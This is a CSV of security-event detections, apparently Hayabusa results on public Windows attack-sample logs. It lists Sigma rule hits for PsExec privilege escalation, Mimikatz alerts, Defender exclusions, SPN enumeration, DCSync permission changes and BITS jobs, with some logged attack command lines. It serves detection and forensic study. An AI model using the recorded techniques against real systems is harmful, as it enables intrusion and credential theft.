2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe  :  Path: C:\Users\Public\psexecprivesc.exe  :  User: MSEDGEWIN10\user02  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\PSEXESVC.exe  :  Path: C:\Windows\PSEXESVC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍  :  Path: C:\Windows\System32\mspaint.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\PSEXESVC.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding  :  Path: C:\Windows\System32\wbem\WmiPrvSE.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha  :  Severity: High  :  Type: Tool  :  User: OFFSEC\admmig  :  Path: file:_C:\Users\admmig\Documents\mimidrv.sys  :  Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D  :  Severity: High  :  Type: Tool  :  User: OFFSEC\admmig  :  Path: file:_C:\Users\admmig\Documents\mimikatz.exe  :  Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha  :  Severity: High  :  Type: Tool  :  User: OFFSEC\admmig  :  Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll  :  Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D  :  Severity: High  :  Type: Tool  :  User: OFFSEC\admmig  :  Path: file:_C:\Users\admmig\Documents\mimikatz.exe  :  Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D  :  Severity: High  :  Type: Tool  :  User: OFFSEC\admmig  :  Path: file:_C:\Users\admmig\Documents\mimikatz.exe  :  Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-16 17:44:51.331 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-16 17:45:04.144 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false  :  Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe""  /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd  :  Path: C:\Windows\SysWOW64\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: powershell.exe   start-process notepad.exe  :  Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\windows\system32\cmd.exe""  /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe""   :  Path: C:\Windows\SysWOW64\notepad.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: powershell.exe   start-process notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe""  @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""  :  Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp  :  Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe""  @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE""  :  Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features  :  Command: setspn  -T offsec -Q */*  :  Path: C:\Windows\System32\setspn.exe  :  User: OFFSEC\admmig  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,Possible SPN Enumeration,,rules/sigma/process_creation/win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
2021-02-03 00:37:59.991 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
2021-02-03 00:37:59.993 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
2021-02-03 00:38:31.989 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
2021-02-03 00:38:31.995 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx
2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx
2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx
2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,informational,Bits Job Creation,Job Title: hackingarticles  :  URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx
2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: ab170ec9.png  :  URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: efc1a28b.png  :  URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
